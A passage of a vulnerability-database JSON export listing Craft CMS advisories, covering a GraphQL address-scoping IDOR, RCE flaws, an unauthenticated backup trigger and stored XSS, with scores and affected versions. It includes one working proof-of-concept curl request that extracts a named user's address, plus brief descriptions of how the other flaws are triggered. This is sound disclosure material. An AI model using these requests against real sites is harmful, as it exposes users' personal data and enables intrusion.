(TaxID: CHE-384.291.057)\n\n---\n\n**Step 5:** Targeted IDOR - extract a specific internal user’s address by owner ID.\n\n```bash\ncurl -s -H \"Authorization: Bearer wbzwuzvlfohtahryztgaawyjpctqdvcm\" -H \"Content-Type: application/json\" -d '{\"query\": \"{ addresses(ownerId: [3]) { fullName addressLine1 addressLine2 locality postalCode countryCode organization\n  organizationTaxId } }\"}' http://localhost:8080/actions/graphql/api | jq\n```\n\n<img width=\"1902\" height=\"365\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b7c6d5cf-295a-433a-a76c-2b69815968cd\" />\n\n> Directly extracts a specific internal team member’s address: “Secret Admin”, 1 Secret Government Facility, Suite 007, Langley 22101 — SecretCorp LLC (TaxID: 98-7654321). The token has zero authorization to access this user’s data.\n\n## Impact \n\n### Who is Impacted\n\nAny Craft CMS Pro site (v4.0.0+) that uses GraphQL API tokens with user group scoping and stores user addresses. This is the standard deployment pattern for headless CMS sites using frameworks such as Next.js, Nuxt.js, or Gatsby. An attacker with any valid GraphQL token that has access to at least one user group can extract all addresses in the system, regardless of scope restrictions.\n\n### Risk\n\n- Direct threat to installation data: Any GraphQL API token with access to any single user group can extract all address systems-wide, including names, home addresses, organizations, and tax IDs belonging to users in restricted groups.\n\n- Targeted extraction via IDOR: The `ownerId` argument allows an attacker to extract specific users’ addresses by ID, enabling targeted reconnaissance against administrators or high-value users without any brute-force or elevated access.\n\n- Scope boundary failure: Craft CMS’s GraphQL schema scoping system is the primary security mechanism for controlling API access. Every other element resolver (Entry, User, Asset, Category, Tag) enforces this boundary. The Address resolver does not, making this a foundational gap in Craft’s native authorization model and not a site-specific configuration issue.\n\n- Affects all installations using GraphQL with user groups: Any Craft CMS Pro site that exposes a scoped GraphQL token and stores addresses is affected. This is the standard headless CMS deployment pattern, not an edge case.\n\n## AI Disclosure\n\nThis vulnerability was identified through manual source code review with AI-assisted analysis (Claude). The initial pattern deviation (Address resolver missing scope filtering while all other resolvers have it) was identified through manual comparison of resolver implementations. AI was used to assist with code navigation, PoC scripting, and report drafting. \n\nAll findings were verified against a local Docker instance of Craft CMS 5.9.17.\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44010","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02886","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44010"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:22:09Z/"}],"url":"https://github.com/craftcms/cms/commit/834b2cf61ad0dcee9b03add44ed402ebf18db128"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-gj2p-p9m4-c8gw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-13T14:22:09Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-gj2p-p9m4-c8gw"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44010","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44010"},{"reference_url":"https://github.com/advisories/GHSA-gj2p-p9m4-c8gw","reference_id":"GHSA-gj2p-p9m4-c8gw","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-gj2p-p9m4-c8gw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/118774?format=json","purl":"pkg:composer/craftcms/cms@4.17.12","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.12"},{"url":"http://public2.vulnerablecode.io/api/packages/118776?format=json","purl":"pkg:composer/craftcms/cms@5.9.18","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.18"}],"aliases":["CVE-2026-44010","GHSA-gj2p-p9m4-c8gw"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-41uv-1axm-fugb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50876?format=json","vulnerability_id":"VCID-4wkr-jx1w-77hn","summary":"CraftCMS has an RCE vulnerability via relational conditionals in the control panel\nA Remote Code Execution vulnerability exists in the Craft CMS 5 conditions system.\n\nThe `BaseElementSelectConditionRule::getElementIds()` method passes user-controlled string input\nthrough `renderObjectTemplate()` -- an unsandboxed Twig rendering function with escaping disabled.\n\nAny authenticated Control Panel user (including non-admin roles such as Author or Editor) can achieve full\nRCE by sending a crafted condition rule via standard element listing endpoints.\n\nThis vulnerability requires no admin privileges, no special permissions beyond basic control panel access, and\nbypasses all production hardening settings (allowAdminChanges: false, devMode: false,\nenableTwigSandbox: true).\n\nUsers should update to the patched 5.99 release to mitigate the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31857","reference_id":"","reference_type":"","scores":[{"value":"0.00138","scoring_system":"epss","scoring_elements":"0.33515","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31857"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/8d4903647dcfd31b8d40ed027e27082013347a80","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-12T14:02:18Z/"}],"url":"https://github.com/craftcms/cms/commit/8d4903647dcfd31b8d40ed027e27082013347a80"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31857","reference_id":"CVE-2026-31857","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31857"},{"reference_url":"https://github.com/advisories/GHSA-fp5j-j7j4-mcxc","reference_id":"GHSA-fp5j-j7j4-mcxc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fp5j-j7j4-mcxc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc","reference_id":"GHSA-fp5j-j7j4-mcxc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-12T14:02:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74586?format=json","purl":"pkg:composer/craftcms/cms@4.17.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.17.4"},{"url":"http://public2.vulnerablecode.io/api/packages/74806?format=json","purl":"pkg:composer/craftcms/cms@5.9.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.9"}],"aliases":["CVE-2026-31857","GHSA-fp5j-j7j4-mcxc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4wkr-jx1w-77hn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49586?format=json","vulnerability_id":"VCID-5mnd-qvaq-k3am","summary":"Unauthenticated Craft CMS users can trigger a database backup\nUnauthenticated users can trigger database backup operations via specific admin actions, potentially leading to resource exhaustion or information disclosure.Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.Craft 3 users should update to the latest Craft 4 and 5 releases, which include the fixes.Resources:\n\nhttps://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68456","reference_id":"","reference_type":"","scores":[{"value":"0.00214","scoring_system":"epss","scoring_elements":"0.4399","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68456"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:26:08Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39","reference_id":"","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:26:08Z/"}],"url":"https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68456","reference_id":"CVE-2025-68456","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68456"},{"reference_url":"https://github.com/advisories/GHSA-v64r-7wg9-23pr","reference_id":"GHSA-v64r-7wg9-23pr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v64r-7wg9-23pr"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr","reference_id":"GHSA-v64r-7wg9-23pr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:26:08Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73170?format=json","purl":"pkg:composer/craftcms/cms@4.16.17","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.17"},{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68456","GHSA-v64r-7wg9-23pr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5mnd-qvaq-k3am"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50362?format=json","vulnerability_id":"VCID-5q5g-jrxm-eyhe","summary":"Craft CMS has Stored XSS in Table Field in its \"Row Heading\" Column Type\nA stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `Row Heading` column type. The application fails to sanitize input within row headings, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.","references":[{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7b372de262b8d9d2ce859f32780c3715719b6f5a","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/7b372de262b8d9d2ce859f32780c3715719b6f5a"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.19","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.19"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.23","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.23"},{"reference_url":"https://github.com/advisories/GHSA-6j87-m5qx-9fqp","reference_id":"GHSA-6j87-m5qx-9fqp","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6j87-m5qx-9fqp"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-6j87-m5qx-9fqp","reference_id":"GHSA-6j87-m5qx-9fqp","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-6j87-m5qx-9fqp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74189?format=json","purl":"pkg:composer/craftcms/cms@4.16.19","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.19"},{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["GHSA-6j87-m5qx-9fqp"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5q5g-jrxm-eyhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49581?format=json","vulnerability_id":"VCID-7y4f-ef7t-47eb","summary":"Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior\nThis was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. Hence, I am reporting this to Craft as I found it to affect the latest (`5.6.0`) version of Craft CMS.\n\nLeveraging a legitimate but maliciously crafted Yii `Behavior` class, it’s possible to trigger Remote Code Execution (RCE) via Reflection when the tainted `Behavior` is attached to a Yii `Component`, and an event is also fired on the tainted 